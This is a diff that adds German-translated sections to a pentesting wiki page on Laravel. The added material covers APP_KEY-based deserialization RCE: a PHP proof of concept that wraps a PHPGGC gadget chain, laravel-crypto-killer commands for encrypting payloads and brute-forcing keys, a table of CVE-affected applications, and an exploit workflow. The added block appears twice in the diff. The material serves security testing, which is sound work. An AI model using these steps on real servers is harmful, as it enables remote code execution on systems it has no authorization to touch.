Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

src/network-services-pentesting/pentesting-web/laravel.md

@@ -1,7 +1,91 @@
 # Laravel
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include /banners/hacktricks-training.md}}
 
+### Laravel SQLInjection
+
+Lesen Sie Informationen dazu hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
+
+---
+
+## APP_KEY & Verschlüsselungsinternas (Laravel \u003e=5.6)
+
+Laravel verwendet AES-256-CBC (oder GCM) mit HMAC-Integrität im Hintergrund (`Illuminate\\Encryption\\Encrypter`).
+Der rohe Chiffretext, der schließlich **an den Client** **gesendet wird**, ist **Base64 eines JSON-Objekts** wie:
+```json
+{
+"iv"   : "Base64(random 16-byte IV)",
+"value": "Base64(ciphertext)",
+"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
+"tag"  : ""                 // only used for AEAD ciphers (GCM)
+}
+```
+`encrypt($value, $serialize=true)` wird standardmäßig `serialize()` den Klartext, während `decrypt($payload, $unserialize=true)` **automatisch `unserialize()`** den entschlüsselten Wert. Daher **kann jeder Angreifer, der den 32-Byte-Geheimschlüssel `APP_KEY` kennt, ein verschlüsseltes PHP-serialisiertes Objekt erstellen und RCE über magische Methoden (`__wakeup`, `__destruct`, …) erlangen**.
+
+Minimal PoC (Framework ≥9.x):
+```php
+use Illuminate\Support\Facades\Crypt;
+
+$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
+$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
+```
+Injiziere den erzeugten String in jede verwundbare `decrypt()` Senke (Routenparameter, Cookie, Sitzung, …).
+
+---
+
+## laravel-crypto-killer 🧨
+[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatisiert den gesamten Prozess und fügt einen praktischen **bruteforce** Modus hinzu:
+```bash
+# Encrypt a phpggc chain with a known APP_KEY
+laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
+
+# Decrypt a captured cookie / token
+laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
+
+# Try a word-list of keys against a token (offline)
+laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
+```
+Das Skript unterstützt transparent sowohl CBC- als auch GCM-Payloads und regeneriert das HMAC/Tag-Feld.
+
+---
+
+## Verwundbare Muster in der realen Welt
+
+| Projekt | Verwundbare Senke | Gadget-Kette |
+|---------|-------------------|---------------|
+| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
+| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` Cookie, wenn `Passport::withCookieSerialization()` aktiviert ist | Laravel/RCE9 |
+| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` Cookie | Laravel/RCE15 |
+
+Der Exploit-Workflow ist immer:
+1. `APP_KEY` beschaffen (Standardbeispiele, Git-Leak, config/.env-Leak oder Brute-Force)
+2. Gadget mit **PHPGGC** generieren
+3. `laravel_crypto_killer.py encrypt …`
+4. Payload über den verwundbaren Parameter/Cookie liefern → **RCE**
+
+---
+
+## Massenhafte APP_KEY-Entdeckung durch Cookie-Brute-Force
+
+Da jede frische Laravel-Antwort mindestens 1 verschlüsseltes Cookie (`XSRF-TOKEN` und normalerweise `laravel_session`) setzt, **leaken öffentliche Internetscanner (Shodan, Censys, …) Millionen von Chiffretexten**, die offline angegriffen werden können.
+
+Wichtige Ergebnisse der von Synacktiv veröffentlichten Forschung (2024-2025):
+* Datensatz Juli 2024 » 580 k Tokens, **3,99 % Schlüssel geknackt** (≈23 k)
+* Datensatz Mai 2025 » 625 k Tokens, **3,56 % Schlüssel geknackt**
+* >1 000 Server sind weiterhin anfällig für das Legacy-CVE-2018-15133, da Tokens direkt serialisierte Daten enthalten.
+* Hohe Schlüsselwiederverwendung – die Top-10 APP_KEYs sind hartcodierte Standardwerte, die mit kommerziellen Laravel-Vorlagen (UltimatePOS, Invoice Ninja, XPanel, …) ausgeliefert werden.
+
+Das private Go-Tool **nounours** erhöht die AES-CBC/GCM-Bruteforce-Durchsatzrate auf ~1,5 Milliarden Versuche/s, wodurch das Knacken des vollständigen Datensatzes auf <2 Minuten reduziert wird.
+
+---
+
+## Referenzen
+* [Laravel: APP_KEY-Leckanalyse](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
+* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
+* [CVE-2018-15133 Write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
+
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Laravel Tricks
 
@@ -12,11 +96,11 @@ Zum Beispiel `http://127.0.0.1:8000/profiles`:
 
 ![](<../../images/image (1046).png>)
 
-Dies ist normalerweise erforderlich, um andere Laravel RCE CVEs auszunutzen.
+Dies wird normalerweise benötigt, um andere Laravel RCE CVEs auszunutzen.
 
 ### .env
 
-Laravel speichert die APP, die es verwendet, um die Cookies und andere Anmeldeinformationen zu verschlüsseln, in einer Datei namens `.env`, die über eine gewisse Pfadtraversierung unter: `/../.env` zugänglich ist.
+Laravel speichert den APP, den es zur Verschlüsselung der Cookies und anderer Anmeldeinformationen verwendet, in einer Datei namens `.env`, die über einen Pfad-Traversal unter: `/../.env` zugänglich ist.
 
 Laravel zeigt diese Informationen auch auf der Debug-Seite an (die erscheint, wenn Laravel einen Fehler findet und aktiviert ist).
 
@@ -98,5 +182,87 @@ Eine weitere Deserialisierung: [https://github.com/ambionics/laravel-exploits](h
 
 Lesen Sie Informationen darüber hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 
+### Laravel SQLInjection
+
+Lesen Sie Informationen darüber hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
+
+---
+
+## APP_KEY & Encryption internals (Laravel \u003e=5.6)
+
+Laravel verwendet AES-256-CBC (oder GCM) mit HMAC-Integrität im Hintergrund (`Illuminate\\Encryption\\Encrypter`).
+Der rohe Chiffretext, der schließlich **an den Client gesendet** wird, ist **Base64 eines JSON-Objekts** wie:
+```json
+{
+"iv"   : "Base64(random 16-byte IV)",
+"value": "Base64(ciphertext)",
+"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
+"tag"  : ""                 // only used for AEAD ciphers (GCM)
+}
+```
+`encrypt($value, $serialize=true)` wird standardmäßig `serialize()` den Klartext, während `decrypt($payload, $unserialize=true)` **automatisch `unserialize()`** den entschlüsselten Wert. Daher **kann jeder Angreifer, der den 32-Byte-Geheimschlüssel `APP_KEY` kennt, ein verschlüsseltes PHP-serialisiertes Objekt erstellen und RCE über magische Methoden (`__wakeup`, `__destruct`, …) erlangen**.
+
+Minimal PoC (Framework ≥9.x):
+```php
+use Illuminate\Support\Facades\Crypt;
+
+$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
+$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
+```
+Injiziere den erzeugten String in jede verwundbare `decrypt()` Senke (Routenparameter, Cookie, Sitzung, …).
+
+---
+
+## laravel-crypto-killer 🧨
+[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatisiert den gesamten Prozess und fügt einen praktischen **bruteforce** Modus hinzu:
+```bash
+# Encrypt a phpggc chain with a known APP_KEY
+laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
+
+# Decrypt a captured cookie / token
+laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
+
+# Try a word-list of keys against a token (offline)
+laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
+```
+Das Skript unterstützt transparent sowohl CBC- als auch GCM-Payloads und regeneriert das HMAC/Tag-Feld.
+
+---
+
+## Verwundbare Muster in der realen Welt
+
+| Projekt | Verwundbare Senke | Gadget-Kette |
+|---------|-------------------|--------------|
+| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
+| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` Cookie, wenn `Passport::withCookieSerialization()` aktiviert ist | Laravel/RCE9 |
+| Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` Cookie | Laravel/RCE15 |
+
+Der Exploit-Workflow ist immer:
+1. `APP_KEY` beschaffen (Standardbeispiele, Git-Leak, config/.env-Leak oder Brute-Force)
+2. Gadget mit **PHPGGC** generieren
+3. `laravel_crypto_killer.py encrypt …`
+4. Payload über den verwundbaren Parameter/Cookie liefern → **RCE**
+
+---
+
+## Massenhafte APP_KEY-Entdeckung durch Cookie-Brute-Force
+
+Da jede frische Laravel-Antwort mindestens 1 verschlüsseltes Cookie setzt (`XSRF-TOKEN` und normalerweise `laravel_session`), **leaken öffentliche Internetscanner (Shodan, Censys, …) Millionen von Chiffretexten**, die offline angegriffen werden können.
+
+Wichtige Ergebnisse der von Synacktiv veröffentlichten Forschung (2024-2025):
+* Datensatz Juli 2024 » 580 k Tokens, **3,99 % Schlüssel geknackt** (≈23 k)
+* Datensatz Mai 2025 » 625 k Tokens, **3,56 % Schlüssel geknackt**
+* >1 000 Server sind weiterhin anfällig für das Legacy-CVE-2018-15133, da Tokens direkt serialisierte Daten enthalten.
+* Hohe Schlüsselwiederverwendung – die Top-10 APP_KEYs sind fest codierte Standardwerte, die mit kommerziellen Laravel-Vorlagen (UltimatePOS, Invoice Ninja, XPanel, …) ausgeliefert werden.
+
+Das private Go-Tool **nounours** erhöht die AES-CBC/GCM-Bruteforce-Durchsatzrate auf ~1,5 Milliarden Versuche/s, wodurch das Knacken des vollständigen Datensatzes auf <2 Minuten reduziert wird.
+
+---
+
+## Referenzen
+* [Laravel: APP_KEY-Leckanalyse](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
+* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
+* [CVE-2018-15133 Write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
 
 {{#include ../../banners/hacktricks-training.md}}